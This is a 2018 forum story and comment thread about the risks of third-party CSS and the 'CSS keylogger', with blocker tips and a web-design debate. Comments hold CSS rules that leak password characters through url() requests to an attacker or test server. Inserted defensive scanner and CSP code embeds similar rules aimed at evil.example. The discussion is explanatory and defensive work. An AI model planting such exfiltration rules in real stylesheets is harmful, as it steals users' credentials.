posted by Fnord666 on Wednesday February 28 2018, @06:07PM
from the just-use-lynx-and-elm dept.

Jake Archibald writes in his blog about the bigger problem presented by importing third-party content into web pages. Even CSS is a problem as a CSS keylogger demo showed the other day.

A few days ago there was a lot of chatter about a 'keylogger' built in CSS.

Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'.

While most are acutely aware of, yet ignore, the danger presented by third-party JavaScript and by JavaScript in general, most forget about CSS. Jake reminds us and walks through quite a few examples of how CSS supplied by third parties can be misused.

Source: Third party CSS is not safe



 
  • (Score: 1, Informative) by Anonymous Coward on Wednesday February 28 2018, @06:21PM (21 children)

    by Anonymous Coward on Wednesday February 28 2018, @06:21PM (#645288)

    Why should I trust a website in the first place? NoScript applies to the website I am visiting as much as it does to anything it implements from a 3rd party.

    • (Score: 4, Informative) by RS3 on Wednesday February 28 2018, @06:30PM (20 children)

      by RS3 (6367) on Wednesday February 28 2018, @06:30PM (#645291)

      NoScript doesn't stop 3rd-party css. Here's an example from a dice.com page:

      <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Condensed">

      • (Score: 3, Interesting) by zocalo on Wednesday February 28 2018, @07:02PM (4 children)

        by zocalo (302) on Wednesday February 28 2018, @07:02PM (#645310)
        uBlock Origin does give you the option, although I think it permits it by default and I turned it off while configuring it.
        --
        UNIX? They're not even circumcised! Savages!
        • (Score: 5, Informative) by zocalo on Wednesday February 28 2018, @07:15PM (3 children)

          by zocalo (302) on Wednesday February 28 2018, @07:15PM (#645319)
          Yep, just done a clean install and uBlock Origin does indeed permit CSS globally by default. Simplest way to set it to first party only is to go into the config screen, select the "My rules" tab, and then click "Edit" under the temporary rules section. Change the line:

          * * css allow

          to:

          * 1st-party css allow

          click "Save", then click "Commit".
          --
          UNIX? They're not even circumcised! Savages!
          • (Score: 3, Informative) by RamiK on Wednesday February 28 2018, @07:49PM (2 children)

            by RamiK (1813) on Wednesday February 28 2018, @07:49PM (#645344)

            Simplest way to set it to first party only is to go into the config screen...

            Just install uMatrix+uBlock instead of NoScript+AdAway and get the same feature-set but with a UI that lets you allow/disallow CSS per-domain or even sub-domain with four clicks of the button.

            --
            compiling...
            • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @10:14PM (1 child)

              by Anonymous Coward on Wednesday February 28 2018, @10:14PM (#645438)

              NoScript protects far more than just JavaScript. Sadly you still need all three. All have unique features.

              • (Score: 2) by RamiK on Wednesday February 28 2018, @11:18PM

                by RamiK (1813) on Wednesday February 28 2018, @11:18PM (#645479)

                NoScript protects far more than just JavaScript.

                The clickjacking protection is covered by the CSS blocking while the XSS and anti-tracking protection is covered by the XHR.

                The additional functionality NoScript also packages is extra scripts that circumvent specific ad-walls. But not only are those scripts fragile and break every other day (literally, as ad-wall operators are actively combating NoScript and AdAway), when they break they leave your client running all the scripts, displaying the ads, and letting viruses through.

                Other than that, citation needed.

                --
                compiling...
      • (Score: 2, Informative) by nitehawk214 on Wednesday February 28 2018, @07:58PM (3 children)

        by nitehawk214 (1304) on Wednesday February 28 2018, @07:58PM (#645350)

        uMatrix does not block 3rd party CSS by default. You can enable it, but it breaks nearly every website.

        --
        "Don't you ever miss the days when you used to be nostalgic?" -Loiosh
        • (Score: 3, Informative) by DannyB on Wednesday February 28 2018, @08:59PM (1 child)

          by DannyB (5839) on Wednesday February 28 2018, @08:59PM (#645394)

          A fun uMatrix tip.

          I've noticed a number of anti-adblocking sites. I go to their page and the site briefly appears, and then is immediately replaced by a fully white background that says

          Something interfered with this website loading.

          I simply turn off 1st party scripts, refresh, and everything seems good.

          In the past, and for years, in some cases I could simply View --> Page Style --> No Style. But no longer.

          uMatrix is so much better than AdBlock -- if you are a geek. It gives you a lot finer control. The ability to individually indicate whether to accept cookies, frames, CSS, HTML, media, even XHR from any site that the page attempts to load from.

          --
          When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
          • (Score: 0) by Anonymous Coward on Thursday March 01 2018, @12:41AM

            by Anonymous Coward on Thursday March 01 2018, @12:41AM (#645526)

            uBlock's eye dropper tool lets you block individual elements like those.

        • (Score: 0) by Anonymous Coward on Thursday March 01 2018, @03:27AM

          by Anonymous Coward on Thursday March 01 2018, @03:27AM (#645591)

          it breaks nearly every website.

          Those websites were broken long before a user with uMatrix came along.

          Yes, 85% of the web is defective by design. Welcome to 2018.

      • (Score: 3, Informative) by tangomargarine on Wednesday February 28 2018, @08:24PM (1 child)

        by tangomargarine (667) on Wednesday February 28 2018, @08:24PM (#645370)

        RequestPolicy even blocks first-party CSS, so I would think they probably block third as well.

        I run AdBlock*+NoScript+RequestPolicy on Pale Moon.

        *whatever the generic version for PM is called

        --
        "Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
        • (Score: 0) by Anonymous Coward on Saturday March 03 2018, @05:47AM

          by Anonymous Coward on Saturday March 03 2018, @05:47AM (#646877)

          I run AdBlock*+NoScript+RequestPolicy on Pale Moon

          Thank you! I grabbed RequestPolicy 0.5.28 straight from Mozilla's add-on site for Firefox [mozilla.org] and it worked like a champ straight away in Pale Moon. (I had already been running "NoScript" and "Adblock Latitude" add-ons for Pale Moon.)

          No more unapproved whacky third-party CSS for me!

      • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @08:28PM (8 children)

        by Anonymous Coward on Wednesday February 28 2018, @08:28PM (#645372)

        This is such a non-issue for browser users, there's hardly any point in blocking 3rd-party CSS at the browser level.

        This "CSS keylogger" depends on Javascript code running on the page to actually capture any keystrokes -- that script has to assign them to an element attribute so the CSS attribute selector can act upon it. Apparently some "web frameworks" do exactly this with password input elements, thus enabling styles to depend on the user's keystrokes in certain situations. Since styles can request external resources, a malicious stylesheet can make the user's browser reveal which styles were applied.

        Sometimes servers send various secrets in attribute values (usually in hidden input elements). A stylesheet could potentially exfiltrate those values in a similar manner, without depending on any Javascript.

        • (Score: 4, Informative) by DannyB on Wednesday February 28 2018, @09:15PM (7 children)

          by DannyB (5839) on Wednesday February 28 2018, @09:15PM (#645401)

          It didn't seem to me like any JavaScript was required. Did you see the CSS example in TFA?

          Suppose you had a single input field <input type="password"/>

          In the example CSS . . .

          input[type="password"][value$="a"] {
            background: url('/password?a');
          }

          This CSS, without any JavaScript, would match your input field named "password". It would match only if the value in the password ended in the letter "a". If so, it would fetch a URL ending in "a".

          Now duplicate that 3 line snippet, and replicate it for every character you might type as a password. Send this CSS stylesheet to the browser.

          input[type="password"][value$="a"] {
            background: url('/password?a');
          }
          input[type="password"][value$="b"] {
            background: url('/password?b');
          }
          /* etc. */
          input[type="password"][value$="z"] {
            background: url('/password?z');
          }

          Now, as you type each character of your password into the field, the "last character" of the field will match a different style rule, which will trigger loading a different background image from the URL. Now, all background images returned could be a 1x1 pixel transparent PNG. My evil.com server will get the URL hits asking for the transparent image for each character of your password as you type it.

          I could further augment this stylesheet to have a similar set of rules, but to slightly different URLs so that I could capture every character you type into the "username" field as well.

          I simply log all these URL hits in my database. I sort them by IP address, then by time. I'll notice a number of character hits, from you, grouped together in short time intervals (when you were typing), first in the username field, then in the password field. Poof! I now have your login credentials -- by sending you nothing more than a CSS file!

          That's almost as fun as monkeying with some Microsoft fanboy's Visual Studio .h files

          #define while if      // speed up code
          #define struct union  // use less memory

          --
          When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
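The attribute-selector-plus-url() shape shown in the post above is easy to recognise mechanically. The scanner below is an added example for this thread, not code from the post or from Jake Archibald's article: a small Node.js script a site operator can run over a third-party stylesheet before serving it, flagging any rule that both matches on an element's value attribute and fetches a URL. The sample stylesheet and the evil.example host are constructed for the demo.

```javascript
// Added example (not from the post above or from Jake Archibald's article):
// a scanner a site operator can run over a third-party stylesheet before
// serving it. It flags rules that both (a) select on an element's value
// attribute and (b) load a URL, which is the shape of the rules quoted in
// the thread. The stylesheet and the evil.example host are constructed.

const SAMPLE_CSS = `
/* benign rules */
body { font-family: "Roboto Condensed", sans-serif; }
input[type="password"] { border: 1px solid #999; }
.logo { background: url('/img/logo.png'); }

/* exfiltration-shaped rules */
input[type="password"][value$="a"] { background: url('https://evil.example/password?a'); }
input[type="password"][value$="b"] { background: url('https://evil.example/password?b'); }
input[name="csrf_token"][value^="7f"] { background-image: url("https://evil.example/t?7f"); }
`;

// [value=...] with any of the CSS attribute operators: = ^= $= *= ~= |=
const VALUE_SELECTOR_RE = /\[\s*value\s*([\^$*~|]?=)\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))\s*\]/i;
// url(...) with double quotes, single quotes or bare.
const URL_RE = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)/i;

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Minimal rule splitter: yields { selector, body } for each "selector { body }".
function splitRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(css)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Return one finding per rule that keys on a value attribute and fetches a URL.
function scanStylesheet(css) {
  const findings = [];
  for (const { selector, body } of splitRules(stripComments(css))) {
    const sel = VALUE_SELECTOR_RE.exec(selector);
    const url = URL_RE.exec(body);
    if (sel && url) {
      findings.push({
        selector,
        operator: sel[1],
        needle: sel[2] ?? sel[3] ?? sel[4],
        url: (url[1] ?? url[2] ?? url[3]).trim(),
      });
    }
  }
  return findings;
}

for (const f of scanStylesheet(SAMPLE_CSS)) {
  console.log(`suspicious: ${f.selector} -> ${f.url}`);
}
```

Run with `node scan.js`; it prints one line per suspicious rule. Rules that use only one of the two ingredients (a value selector without url(), or a url() without a value selector) are not reported, and the hidden-input case mentioned elsewhere in the thread is covered because the check is on the value attribute, not on type="password".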
          • (Score: 2, Informative) by Anonymous Coward on Wednesday February 28 2018, @11:24PM (3 children)

            by Anonymous Coward on Wednesday February 28 2018, @11:24PM (#645485)

            Suppose you had a single input field <input type="password"/>

            In the example CSS . . .

            input[type="password"][value$="a"] {
                    background: url('/password?a');
            }

            This CSS, without any JavaScript, would match your input field named "password". It would match only if the value in the password ended in the letter "a". If so, it would fetch a URL ending in "a".

            No, this does not work as you describe. The CSS attribute selector is based on the element's value attribute in the DOM, which does not depend on what the user types. Try it and see -- this selector simply does not match your example element since it has no value attribute.

            With your example input, there is no value attribute, so the selector is not matched. Javascript is required to update the DOM in order for the style to be applied "dynamically". Alternately, the server could send a value attribute to start with (for example, <input type='password' value='endswitha' />, but this is static and also not changed by user input.

            • (Score: 2) by coolgopher on Thursday March 01 2018, @12:37AM

              by coolgopher (1157) on Thursday March 01 2018, @12:37AM (#645523)

              And this is where the comment about this attack largely depending on React-like frameworks comes in: there it's very common to make a control "managed" by keeping the authoritative state outside of the DOM and injecting it as needed via the value="xyz" attribute of the control.

            • (Score: 2) by DannyB on Thursday March 01 2018, @02:34PM (1 child)

              by DannyB (5839) on Thursday March 01 2018, @02:34PM (#645769)

              Okay. So I just now constructed a trivial example, and you're right. I cannot get this to happen.

              A page H1.html:

              Type password here: <input type="password" value=""/>
              <style>
                  input[type="password"][value$="a"] { background: url("https://some.server/example/H2.jsp?char='a'"); }
                  input[type="password"][value$="b"] { background: url("https://some.server/example/H2.jsp?char='b'"); }
                  input[type="password"][value$="c"] { background: url("https://some.server/example/H2.jsp?char='c'"); }
                  input[type="password"][value$="d"] { background: url("https://some.server/example/H2.jsp?char='d'"); }
              </style>

              And a responder H2.jsp:

              <%System.out.println("H2: "+request.getParameter("char"));%>

              Now my responder does not return an image. But it does print on the server's console when a request is received, and what the "char" parameter value is.

              By manually invoking the URL from the browser's address bar:

              I can get the server's console to print out:

              H2: foobar

              But not by typing in the password field. I also tried changing the field type from password to text.

              I tried in Chrome, Firefox, IE and Edge.

              I also tried "relative" URLs rather than fully qualified URLs that specify the https and server name.

              So I must be misunderstanding something in TFA.

              --
              When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
              • (Score: 0) by Anonymous Coward on Tuesday March 06 2018, @08:15PM

                by Anonymous Coward on Tuesday March 06 2018, @08:15PM (#648658)

                So I must be misunderstanding something in TFA.

                Styles can depend on the state of the DOM, and Javascript can update the DOM (and therefore cause style changes). Without Javascript, the DOM is fixed once the document is loaded and, for the most part, so are styles (the exceptions are certain pseudo-classes like :visited and :checked).

                In TFA, the 3rd-party stylesheet is "leaking" the state of the DOM, which is updated by some 1st-party Javascript libraries. This could be a problem for website operators because they may be giving more control of their site to third parties than they imagined. (Although even without this kind of information leak stylesheets have almost total control over the document's presentation and malicious styles can do all sorts of nasty things).

                But the reason I say this is an almost total non-issue for browser users is because third party content doesn't really change the story for them. Either the site is logging keystrokes or it is not. Whether that's done by 1st-party or 3rd-party scripts/styles/whatever doesn't really matter.
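The two paragraphs above frame the risk for site operators rather than browser users: whoever can serve a stylesheet to the page controls what that stylesheet can observe. The browser-side counterpart discussed earlier in the thread is uBlock/uMatrix; the site-side control is a Content-Security-Policy header whose style-src directive lists the origins styles may come from. The code below is an added example, not from the thread or the article: the weak and the corrected header values, plus a deliberately simplified model of CSP source matching ('self', '*', and host sources with optional scheme, port and *.host wildcard) so the policy text can be checked against stylesheet URLs. The page origin shop.example and the other host names are constructed; real enforcement is done by the browser, and the fallback to default-src when style-src is absent is not modelled.

```javascript
// Added example (not from the thread or the article): a site-side control
// for third-party CSS. A Content-Security-Policy header restricts which
// origins the browser will load stylesheets from; the matcher below is a
// simplified model of CSP source matching used only to test the policy text.
// Origins and host names are constructed for the demo.

const PAGE_ORIGIN = 'https://shop.example';            // constructed

// Weak setting: styles may come from anywhere.
const WEAK_POLICY = 'style-src *';

// Corrected setting: the page's own origin plus one explicitly vetted host.
const STRICT_POLICY = "style-src 'self' https://fonts.googleapis.com";

// Return the source list of the style-src directive, or null if absent.
// (A real browser would then fall back to default-src; not modelled here.)
function parseStyleSrc(policy) {
  for (const directive of policy.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] === 'style-src') return tokens.slice(1);
  }
  return null;
}

// Parse a host-source such as "https://fonts.googleapis.com", "*.cdn.example"
// or "cdn.example:8443" into protocol, host pattern and port.
function parseHostSource(src, defaultProtocol) {
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?/i.exec(src);
  if (!m) return null;
  return {
    protocol: (m[1] ? m[1] + ':' : defaultProtocol).toLowerCase(),
    host: m[2].toLowerCase(),
    port: m[3] || '',
  };
}

// "*.cdn.example" matches any subdomain of cdn.example but not cdn.example itself.
function hostMatches(pattern, host) {
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1);
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

// Would the browser be allowed to load stylesheetUrl on a page at pageOrigin
// under this policy? Simplified model: keywords 'self' and '*', plus host-sources.
function isStyleSourceAllowed(policy, stylesheetUrl, pageOrigin) {
  const sources = parseStyleSrc(policy);
  if (sources === null) return true;                 // no style-src: unrestricted in this model
  const page = new URL(pageOrigin);
  const sheet = new URL(stylesheetUrl, pageOrigin);  // resolves relative paths
  for (const src of sources) {
    if (src === "'self'") {
      if (sheet.origin === page.origin) return true;
      continue;
    }
    if (src === '*') return true;
    if (src.startsWith("'")) continue;               // other keywords ('none', nonces, ...) not modelled
    const pat = parseHostSource(src, page.protocol);
    if (!pat) continue;
    if (pat.protocol !== sheet.protocol) continue;
    if (!hostMatches(pat.host, sheet.hostname)) continue;
    if (pat.port !== '*' && pat.port !== sheet.port) continue; // '' means the scheme's default port
    return true;
  }
  return false;
}

// Demo: the same third-party stylesheet under the weak and the corrected policy.
const EXFIL_SHEET = 'https://evil.example/exfil.css';  // constructed
console.log('weak   :', isStyleSourceAllowed(WEAK_POLICY, EXFIL_SHEET, PAGE_ORIGIN));   // true
console.log('strict :', isStyleSourceAllowed(STRICT_POLICY, EXFIL_SHEET, PAGE_ORIGIN)); // false
```

The header itself is sent as `Content-Security-Policy: <policy>` on the HTML response; with STRICT_POLICY the browser refuses to apply a stylesheet from any origin other than the page's own and the one listed host, which is the operator-side equivalent of the "1st-party css allow" rule discussed above. The matcher is there to test policy text in CI, not to replace the browser's enforcement.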

          • (Score: 2) by julian on Wednesday February 28 2018, @11:33PM (1 child)

            by julian (6003) on Wednesday February 28 2018, @11:33PM (#645491)

            That's brilliant and terrifying.

            The web was a mistake.

            • (Score: 2) by FatPhil on Thursday March 01 2018, @10:09AM

              by FatPhil (863) <pc-soylentNO@SPAMasdf.fi> on Thursday March 01 2018, @10:09AM (#645701)
              The stupid thing is that this type of bugfeature was known about nearly a decade ago.
              It was introduced in CSS2, and fixed in CSS2.1
              And now they brought it back, because repeating mistakes is hilarious.
              https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/
              --
              Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
          • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:05AM

            by MichaelDavidCrawford (2339) <mdcrawford@gmail.com> on Thursday March 01 2018, @01:05AM (#645540)

            -d

            After seeing this in someone's source I always employ it myself. I can't be bothered to use #error:

            #if this

            #elif that

            #elif those

            #else
            you
            lose
            #endif

            Don't say I never did nothin' fer ya.

            --
            Yes I Have No Bananas. [gofundme.com]
  • (Score: 5, Insightful) by Justin Case on Wednesday February 28 2018, @06:33PM (12 children)

    by Justin Case (4239) on Wednesday February 28 2018, @06:33PM (#645293)

    Between malice and incompetence, almost everything that uses electricity is getting damn hard to batten down.

    Trusty old desktop went belly up this week. Looking for a new one, almost all of them (so far) have built-in wireless that can't be hardware-switch disabled.

    A Garmin GPS I bought less than a year ago fried its internal file system. You can't just pop an SD card and replace it with a good backup, because Garmin does not want their shitty proprietary software copied, not even by the legitimate buyer.

    Increasingly web sites don't work on any sane defensive configuration.

    My bank is requiring me to do things using an app or a website, both of which are impossible to audit much less trust. Same for my health insurance company.

    I am increasingly understanding that RMS has been right all along, and about the only option remaining is to go full Amish.

    • (Score: 2) by RS3 on Wednesday February 28 2018, @06:46PM

      by RS3 (6367) on Wednesday February 28 2018, @06:46PM (#645299)

      Trusty old desktop went belly up this week. Looking for a new one, almost all of them (so far) have built-in wireless that can't be hardware-switch disabled.

      Isn't that nice of them to give you all of that foolproof goodness built right in? I'll lend you a soldering iron. Frankly the antenna chip would be very easy to pry off, if done carefully. An X-acto knife will also fix it.

      My bank is requiring me to do things using an app or a website, both of which are impossible to audit much less trust. Same for my health insurance company.

      Time to go bank shopping! A federal credit union might be much better.

    • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @06:51PM (3 children)

      by Anonymous Coward on Wednesday February 28 2018, @06:51PM (#645303)

      Trusty old desktop went belly up this week. Looking for a new one, almost all of them (so far) have built-in wireless that can't be hardware-switch disabled.

      You just need a handy little tool [uline.com]...

      • (Score: 3, Funny) by maxwell demon on Wednesday February 28 2018, @07:20PM (2 children)

        by maxwell demon (1608) on Wednesday February 28 2018, @07:20PM (#645321)

        To cut the wireless wires?

        --
        The Tao of math: The numbers you can count are not the real numbers.
        • (Score: 3, Funny) by nitehawk214 on Wednesday February 28 2018, @08:07PM (1 child)

          by nitehawk214 (1304) on Wednesday February 28 2018, @08:07PM (#645358)

          I used a wireless wirecutter to cut the strings of my air guitar.

          --
          "Don't you ever miss the days when you used to be nostalgic?" -Loiosh
          • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @10:53PM

            by Anonymous Coward on Wednesday February 28 2018, @10:53PM (#645464)

            Why not build one? Or get a brand name a few years old...?

            I only have one desktop with wifi built in, and that is from 2006. Everything else doesn't, and I run a cable to them. Laptops have had wifi integrated into them for years now though, for more of a good reason than desktops.

    • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @08:43PM (4 children)

      by Anonymous Coward on Wednesday February 28 2018, @08:43PM (#645381)

      My bank is requiring me to do things using an app or a website, both of which are impossible to audit much less trust. Same for my health insurance company.

      Okay, I'm confused now... why is this a problem?

      Put another way, I assume you have never audited the internal systems of their system. Yet you still are willing to go to a branch and deposit money, or rely on direct deposit or something else.

      If you are willing to trust a bank to handle things there, why would you not trust them on a website or an app. To be clear, they can be broken... but then the bank is on the hook to fix it and make reparations.

      • (Score: 5, Informative) by Justin Case on Wednesday February 28 2018, @08:51PM

        by Justin Case (4239) on Wednesday February 28 2018, @08:51PM (#645389)

        Because they want to execute their crap code on my hardware, exposing my data including data that has nothing to do with them. They won't be "on the hook" for the damage they cause; they will be oblivious. Like most of their customers.

      • (Score: 4, Informative) by lentilla on Wednesday February 28 2018, @09:02PM

        by lentilla (1770) on Wednesday February 28 2018, @09:02PM (#645396)

        I assume you have never audited the internal systems of [your bank's] system

        The reason this isn't a problem is that when the bank robbers turn up and steal all the cash, they are stealing the bank's cash, and the bank still owes you the money you have loaned to them. Chances are good you'll get your three bucks and fifty-one cents, or whatever happens to be in your account.

        If you are willing to trust a bank to handle things there, why would you not trust them on a website or an app[?]

        For the same reason I don't invite those robbers back to my place for a cuppa and all my cash and goodies. It's simply a matter of exposure. Not to mention banks tend to have security people whose sole job it is to make sure their cash and their systems are secure. Ordinary people can't be expected to be full-time ordinary people and security experts. And even assuming they wanted to: auditing secret software is difficult - by the unlikely chance it's even allowed by the terms of service.

        No, the grandparent has good reason to be wary.

      • (Score: 2) by Arik on Thursday March 01 2018, @12:07AM

        by Arik (4543) on Thursday March 01 2018, @12:07AM (#645509)
        The bank is requiring him to violate the security of his own machine, not their computers, his own machine. You don't think that's a problem?

        --
        If laughter is the best medicine, who are the best doctors?
      • (Score: 1, Touché) by Anonymous Coward on Thursday March 01 2018, @02:43PM

        by Anonymous Coward on Thursday March 01 2018, @02:43PM (#645773)

        but then the bank is on the hook to fix it and make reparations.

        When was the last time you sued your bank?

    • (Score: 2) by DannyB on Wednesday February 28 2018, @09:29PM

      by DannyB (5839) on Wednesday February 28 2018, @09:29PM (#645408)

      I've heard about strange things Banks do on the web.

      Most likely they are trying to protect ${ you | themselves } from someone pretending to be you when logging in to your account.

      They do this in all sorts of ways. Sometimes by using "something you know" that is not a password. Maybe "something you know" like a series of animal pictures. The pictures are presented in random order, but if you click the bird, the squirrel, then the ostrich, you must be the right person. Some other malicious JavaScript on the page won't get anything by key logging. And would have to be specially tailored to know about this picture technique, and discover the random arrangement of the images this time, and which ones you clicked.

      Some even use (yuk!) Java Applets -- in an effort to hide their authentication attempt within a different execution environment. Nevermind how bad an idea it was, in hindsight, to ever have allowed any ${ Applets | ActiveX | Flash | Silverlight } that can interact with JavaScript on the page. What could possibly go wrong?

      --
      When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
    • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:09AM

      by MichaelDavidCrawford (2339) <mdcrawford@gmail.com> on Thursday March 01 2018, @01:09AM (#645541)

      You may have at least heard of Oracle's "Cover Oregon" clusterfuck.

      After it had been - cough - "Live" - cough - I tried to use it to sign up for Obamacare from my MacBook Pro.

      When was this? 2014 or some such. Anyway a long time since Microsoft claimed to have surrendered to the HTML validity wars.

      Cover Oregon required Internet Explorer. It's not available for Mac OS X.

      Eventually the state sued Oracle, Oracle sued the state, and the state started using healthcare.gov.

      Meanwhile Washington's Obamacare site works just fine.

      --
      Yes I Have No Bananas. [gofundme.com]
  • (Score: 2) by RS3 on Wednesday February 28 2018, @06:41PM (15 children)

    by RS3 (6367) on Wednesday February 28 2018, @06:41PM (#645298)

    All of this code-bloating functionality being added to webpages and browsers, and we have to bloat some more with add-ons, extensions, and plugins just to stop all of it. If only someone would make a slimmed-down simplified browser... let's name it, I don't know, maybe something hot and sly. (cough cough)

    "disable-HTML" purports to block several things including CSS. Trying it now... seems to work! Here's a link for Chrome-based browsers:

    https://chrome.google.com/webstore/detail/disable-html/lfhjgihpknekohffabeddfkmoiklonhm?hl=en-US [google.com]

    "uMatrix" also does this, well. I like it, but it's a bit of work to teach it.

    • (Score: 1, Interesting) by Anonymous Coward on Wednesday February 28 2018, @07:05PM (11 children)

      by Anonymous Coward on Wednesday February 28 2018, @07:05PM (#645311)

      I could have sworn that disabling external fonts was a standard feature in at least one browser. Disabling CSS should be easier. Custom stylesheets might require a plugin.

      • (Score: 2) by maxwell demon on Wednesday February 28 2018, @07:23PM (10 children)

        by maxwell demon (1608) on Wednesday February 28 2018, @07:23PM (#645326)

        Disabling CSS should be easier.

        Indeed, Firefox has an option for it right in its menu (or maybe had? I don't know what changed in the latest versions).

        --
        The Tao of math: The numbers you can count are not the real numbers.
        • (Score: 1, Informative) by Anonymous Coward on Wednesday February 28 2018, @09:27PM (5 children)

          by Anonymous Coward on Wednesday February 28 2018, @09:27PM (#645406)

          Unfortunately nobody knows how to design webpages anymore. The entire layout breaks down because it's some garbage hammered together in a manner wherein the layout isn't preserved if styles are turned off (properly designed HTML pages of ages past would render correctly because devs didn't assume the web was some magical WYSIWYG thingamabob).

          • (Score: 4, Interesting) by lentilla on Thursday March 01 2018, @02:24AM (4 children)

            by lentilla (1770) on Thursday March 01 2018, @02:24AM (#645572)

            No, the websites of today are far better than those of the past.

            I do, however, understand how you have reached the conclusion that "nobody knows how to design webpages anymore". In the past, if you "turned off styles", the most that would likely happen is the text was in black-and-white, the fonts lost their bling, but the page more-or-less looked the same. The graphics stayed put and the page layout was basically the same. Nowadays, "turn off styles" and the entire page falls apart - everything in a single long column and stuff that was on the right-hand side of the page now appears at the bottom of the column.

            That is by design. In fact, it was the web-designers of the past who were in error. (It wasn't their fault - more on that below.)

            You remember all that high-minded talk about separation of content and presentation? Well, in the bad old days, it really was just talk. Due to the horrid compliance to web "standards", the only way a web designer could make a webpage stay together was to use nasty little tricks. (Microsoft's Internet Explorer holds the lion's share of the blame here.) Web-design was pretty much the antithesis of programming - nothing was deterministic, and the page would render ten different ways in five different browsers and sometimes changed depending on the wind.

            The main dirty tricks used in the past were tables and frames. Whilst it worked (sort-of), doing so created an entire class of other problems. Fragility was one. Remember "Best designed for Internet Explorer at 800x600 resolution"? Yuck. The other big loser was semantic context. Our brain is pretty good at turning a page into information, but I would have hated to rely on a screen reader to parse a single webpage. Today, despite the seemingly random jumble of text when styles are turned off, the page is much more transparent to screen readers and other automated systems.

            So time moved on and today we have HTML5. Which, for anyone who was forced to design webpages in the past, is a thing of true beauty. It follows the "principle of least surprise" (mostly), the language can be regular (you can treat it as XML and validate your code - yeah, can you imagine a programming language where nobody could tell you if it was syntactically correct? Yep, that was HTML in the past.) Semantic tags allow us to identify the purpose of content on our page. One example is having a "navigation section" tagged with a <nav> tag which is immediately obvious to screen readers.

            CSS ("styles") go hand-in-glove with HTML5. The HTML describes the content and the CSS describes the presentation. After years of being a pipe-dream it's more-or-less possible to achieve separation. On the first level, CSS allows the designer to specify fonts and colours. On the second level, there is something called the "box model" which allows placement of elements of the page. On the third level, a properly designed page will flow correctly no matter what size the page is being rendered on. Like was originally intended - before HTML in reality became a bastardised version of a PDF that would break when the wind changed.

            The downside to all this magic is that the webpage falls apart when styles are turned off. Trust me, it only falls apart visually. (Unsurprising, since you turned the "visual" part off.) At the same time, the page remains utterly readable to machines.

            Having a webpage fall apart is a worthwhile price to pay. So many, many man-years of programmer time were wasted in the intervening years.

            • (Score: 0, Touché) by Anonymous Coward on Thursday March 01 2018, @04:03AM

              by Anonymous Coward on Thursday March 01 2018, @04:03AM (#645598)

              No, the websites of today are far better than those of the past.

              Ha! Good one. Oh, wait, you're serious?

              BWAAAHAHAHAHAHAHAHAHAHAHAHA!

            • (Score: 4, Insightful) by maxwell demon on Thursday March 01 2018, @06:57AM (1 child)

              by maxwell demon (1608) on Thursday March 01 2018, @06:57AM (#645645) Journal

              The number of properly designed pages is very low. And many current web sites are a load of JavaScript anyway, and without JavaScript, you get displayed none of the content (how does that work with screen readers?). And those which aren't typically have a hard-coded width; if shown in a big window, you just get loads of blank on both sides; even worse, if the font is too small on your display and you magnify it, the column doesn't get wider, so less text fits in that tiny column.

              No, the good old time was when web designers didn't yet exist. People would write web pages that worked well without placement. Yes, browsers would render them slightly different, but that was expected and didn't matter, because the pages just contained the information.

              Now in theory, using CSS you can write designed web pages that don't fall apart when CSS is disabled. No, you won't get fancy designs that way, but things can be in a logical order, and there are still the logical tags like h1, h2, em, strong, etc. It's just that few people care to do that. So in theory, CSS was a godsend. But in reality, web designers don't use it well.

              --
              The Tao of math: The numbers you can count are not the real numbers.
              • (Score: 2) by Pino P on Thursday March 01 2018, @10:00PM

                by Pino P (4721) on Thursday March 01 2018, @10:00PM (#646032) Journal

                and without JavaScript, you get displayed none of the content (how does that work with screen readers?)

                According to Mother Effing Tool Confuser [mothereffingtoolconfuser.com], web browsers that output speech execute JavaScript in the same way as visual ones. They just use the stylesheet's voice properties instead of its visual properties, and they use ARIA attributes to announce important elements to the user.

            • (Score: 0) by Anonymous Coward on Thursday March 01 2018, @03:49PM

              by Anonymous Coward on Thursday March 01 2018, @03:49PM (#645813)

              Yes, instead in our brave new world we have "Best viewed with Google Chrome", alongside myriads of CSS hacks meant to work around browser specific deficiencies (that bog down every other browser by virtue of being forced to log and deal with invalid CSS not meant for it), webpages composed of 40+ layers of nested content-less divs, AJAX that silently loads page components and mysteriously breaks if a connection times out, web pages trying to do the browser's job and lazy-load images (so now we can't even get images w/o scripting).

              ...as for it being easier for machines to understand webpages. If this were actually the case we would be seeing an uptick in browser diversity; instead there's really just one rendering engine to rule them all now (with the remaining alternatives milling about in a morass of increasing irrelevance).

        • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:15AM (3 children)

          by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @01:15AM (#645546) Homepage Journal

